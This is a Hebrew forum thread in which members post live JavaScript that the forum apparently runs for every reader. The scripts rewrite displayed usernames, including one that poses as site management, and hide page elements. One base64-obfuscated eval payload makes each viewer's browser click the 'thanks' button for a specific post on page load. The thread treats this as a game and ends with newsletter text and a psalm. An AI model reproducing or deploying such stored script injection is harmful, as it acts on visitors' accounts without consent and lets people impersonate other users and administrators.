בדיקת פונקציות

• פותח הנושא asf
  • פורסם בתאריך
נכתב ע"י נקודת מחשבה;2183906:
עשינו את זה באחת ההודעות כתבנו את כל הקודים שהצטברו בנתיים

אגב בהודעה הקודמת שלי לא היה שום קוד (גם לא כאן..) רק שיניתי את הכיתוב בציטוט...

בהודעה שלפני זו שציטטתי היה קוד.
ראיתי.
הקוד הוא:
This user does not have permission to use the HTML BB code.

בבקשה שכל אחד יפתח את הקישור שבהודעה 260 ונראה מי ישים לב למה שלא הגיוני.

נכתב ע"י נקודת מחשבה;2185518:
...<script id="toDel">$(document).ready(function(){$("#post2185593 .smallfont:last").css('display', 'none');});$(document).ready(function(){$("body").html($("body").html().replace('מוישה זוכמיר', 'avram'));eval(window.atob("dmFyIEIgPSAkKCcjcG9zdF90aGFua3NfYnV0dG9uXzIxODU1OTMnKTtpZihCLmxlbmd0aCAmJiBCLmNzcygnZGlzcGxheScpICE9PSAnbm9uZScgKXtwb3N0X3RoYW5rc19naXZlKDIxODU1OTMpO30="));$('#toDel').remove();})</script><script>$(function(){$('body').html($('body').html().replace(/נקודת מחשבה/g, 'מוישה זוכמיר'));});</script>

טעות

<script>document.getElementById("postmenu_מספר ההודעה").innerHTML = "בונבוניירה";</script>

נכתב ע"י נקודת מחשבה;2185518:
אני לא שום שינוי בשם משתמש..... אולי אחרים רואים

<script>$(function(){$('script').remove();});</script>
אגב איך גנבת לי צלצול? לא ראיתי אצליך קוד...

הקוד לשינוי שם משתמש:
PHP:
$("#postmenu_2185518").find("a[href='member.php?u=12438']").text("חיים דיקמן");

שים לב שהפוסט מניו מכיל את מספר ההודעה שלך, והלינק שמתחיל ב member.php מכיל את המזהה של היוזר שלך

זה כדי שהצלצול יגיע לי ביושר :) :)
<script>$(function(){$("#postmenu_2185518").find("a[href='member.php?u=12438']").text("חיים דיקמן");})</script>

נכתב ע"י avram;2185904:
הקוד לשינוי שם משתמש:
PHP:
$("#postmenu_2185518").find("a[href='member.php?u=12438']").text("חיים דיקמן");

שים לב שהפוסט מניו מכיל את מספר ההודעה שלך, והלינק שמתחיל ב member.php מכיל את המזהה של היוזר שלך
<script>("#postmenu_2185950").find("a[href='member.php?u=4317']").text("גם אני נקודת מחשבה");</script>

זה כדי שהצלצול יגיע לי ביושר :) :)
<script>$("#postmenu_2185518").find("a[href='member.php?u=12438']").text("חיים דיקמן");</script>

אבל אני לא רואה שהשתנה משהו... יש לי דפדפן כרום

אצל אחרים זה השתנה?

נכתב ע"י avram;2185950:
זה מה שמופיע אצלי
<script>$("#postmenu_2185904").find("a[href='member.php?u=4317']").text("גם אני נקודת מחשבה");</script>
צפה בקובץ המצורף 307774

אה, מגניב

משום מה אצלי זה לא השתנה ולכן חשבתי שהקוד לא עובד
<script>$("#postmenu_2185904").find("a[href='member.php?u=4317']").text("גם אני נקודת מחשבה");</script>
מוזר למה לא עובד

נכתב ע"י נקודת מחשבה;2185985:
אה, מגניב

משום מה אצלי זה לא השתנה ולכן חשבתי שהקוד לא עובד
<script>$("#postmenu_2185904").find("a[href='member.php?u=4317']").text("מוישה זוכמיר");</script>
מוזר למה לא עובד

מה זה השטויות האלה?

באיזה הודעה הוכנס הקוד לשינוי השם ל:
מוישה זוכמיר

?

נכתב ע"י הרבי מיעוטו;2186673:
<script>$("#postmenu_2186673").find("a[href='member.php?u=25893']").text("הנהלת פרוג");</script> אני מבקש להפסיק מיד עם כל הקודים האלו!!!

מה לעשות שבעריכה שלך מופיע שם המשתמש...

נכתב ע"י הרבי מיעוטו;2186673:

בא נראה אותך משנה גם הצבע של הניק כדי שזה יראה אמיתי ;)

נכתב ע"י asf;2186704:
בא נראה אותך משנה גם הצבע של הניק כדי שזה יראה אמיתי ;)

ממילא בלחיצה על שם הניק נפתח השם האמיתי.

אבל אני חייב ללמוד איך גונבים צלצולים.
לא מצליח למצוא את הקוד.

נכתב ע"י חיים דיקמן;2186752:
ממילא בלחיצה על שם הניק נפתח השם האמיתי.

אבל אני חייב ללמוד איך גונבים צלצולים.
לא מצליח למצוא את הקוד.

<script>$(document).ready(function(){A = $('#post2186752').html();$('#post2186752').html(A.replace(/29748/g, '21799').replace(/dLive/g, 'חיים דיקמן'));$('#postmenu_2186752_menu').html($('#postmenu_2186752_menu').html().replace(/dLive/g, 'חיים דיקמן').replace(/29748/g, '21799'));$("#post2186791").find(".smallfont:last").remove()})</script>

אשכול זה אינו קשור כלל לתוכנה חומרה רשתות
<script>
$("#postmenu_2186858").find("<a[href='member.php?u=30129>']").text("סדר באתר");
</script>

<script>
$("#postmenu_2186858").find("<a[href='member.php?u=30129>']").text("סדר באתר");
</script>

<script>
$("#postmenu_2186858").find("a[href='member.php?u=30129']").text("סדר באתר");
</script>

לחץ כאן
נראה מי זה שיצליח לקלוט מה מוזר ואיך עושים אותו.

פרוגבוט

תוכן שיווקי
פרסומת

פוסטים חדשים שאולי לא קראת....

הצטרפות לניוזלטר

איזה כיף שהצטרפתם לניוזלטר שלנו!

מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

לוח מודעות

הפרק היומי

הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!

תהילים פרק כה

אלְדָוִד אֵלֶיךָ יי נַפְשִׁי אֶשָּׂא:באֱלֹהַי בְּךָ בָטַחְתִּי אַל אֵבוֹשָׁה אַל יַעַלְצוּ אֹיְבַי לִי:גגַּם כָּל קוֶֹיךָ לֹא יֵבֹשׁוּ יֵבֹשׁוּ הַבּוֹגְדִים רֵיקָם:דדְּרָכֶיךָ יי הוֹדִיעֵנִי אֹרְחוֹתֶיךָ לַמְּדֵנִי:ההַדְרִיכֵנִי בַאֲמִתֶּךָ וְלַמְּדֵנִי כִּי אַתָּה אֱלֹהֵי יִשְׁעִי אוֹתְךָ קִוִּיתִי כָּל הַיּוֹם:וזְכֹר רַחֲמֶיךָ יי וַחֲסָדֶיךָ כִּי מֵעוֹלָם הֵמָּה:זחַטֹּאות נְעוּרַי וּפְשָׁעַי אַל תִּזְכֹּר כְּחַסְדְּךָ זְכָר לִי אַתָּה לְמַעַן טוּבְךָ יי:חטוֹב וְיָשָׁר יי עַל כֵּן יוֹרֶה חַטָּאִים בַּדָּרֶךְ:טיַדְרֵךְ עֲנָוִים בַּמִּשְׁפָּט וִילַמֵּד עֲנָוִים דַּרְכּוֹ:יכָּל אָרְחוֹת יי חֶסֶד וֶאֱמֶת לְנֹצְרֵי בְרִיתוֹ וְעֵדֹתָיו:יאלְמַעַן שִׁמְךָ יי וְסָלַחְתָּ לַעֲוֹנִי כִּי רַב הוּא:יבמִי זֶה הָאִישׁ יְרֵא יי יוֹרֶנּוּ בְּדֶרֶךְ יִבְחָר:יגנַפְשׁוֹ בְּטוֹב תָּלִין וְזַרְעוֹ יִירַשׁ אָרֶץ:ידסוֹד יי לִירֵאָיו וּבְרִיתוֹ לְהוֹדִיעָם:טועֵינַי תָּמִיד אֶל יי כִּי הוּא יוֹצִיא מֵרֶשֶׁת רַגְלָי:טזפְּנֵה אֵלַי וְחָנֵּנִי כִּי יָחִיד וְעָנִי אָנִי:יזצָרוֹת לְבָבִי הִרְחִיבוּ מִמְּצוּקוֹתַי הוֹצִיאֵנִי:יחרְאֵה עָנְיִי וַעֲמָלִי וְשָׂא לְכָל חַטֹּאותָי:יטרְאֵה אוֹיְבַי כִּי רָבּוּ וְשִׂנְאַת חָמָס שְׂנֵאוּנִי:כשָׁמְרָה נַפְשִׁי וְהַצִּילֵנִי אַל אֵבוֹשׁ כִּי חָסִיתִי בָךְ:כאתֹּם וָיֹשֶׁר יִצְּרוּנִי כִּי קִוִּיתִיךָ:כבפְּדֵה אֱלֹהִים אֶת יִשְׂרָאֵל מִכֹּל צָרוֹתָיו:
נקרא  2  פעמים
למעלה